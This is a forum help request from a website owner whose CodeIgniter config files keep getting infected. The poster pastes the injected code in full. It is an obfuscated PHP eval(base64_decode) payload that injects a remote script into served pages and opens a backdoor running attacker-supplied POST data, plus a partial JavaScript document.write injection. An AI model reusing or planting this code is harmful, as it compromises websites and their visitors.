[eluser]minhbu[/eluser]
now my website is being attacked by virus.Sometimes it append this source on top file config.php,database.php in folder system/application/config
Code:
<?php eval(base64_decode('aWYoIWlzc2V0KCRmOXhuNDEpKXtmdW5jdGlvbiBmOXhuNCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJoaGJtNWhZbUZ5WW1WeVlTNWpiMjB1WW5JdmMyTjFZbWxrZFM4eE1HMWhhWE11Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGY5eG40MigkYSwkYiwkYywkZCl7Z2xvYmFsICRmOXhuNDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGY5eG40MSkpY2FsbF91c2VyX2Z1bmMoJGY5eG40MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdmOXhuNCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdmOXhuNCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmOXhuNGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Y5eG40MicpKSE9J2Y5eG40MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
and file js it append this source into bottom file
Code:
document. write(' [removed]<\/ script>');
although i was chmod all files to 444 but virus chmoded all to 644 and appended sources into my files
how to delete virus or anti them?
i deleted index.html,index.php,default.php files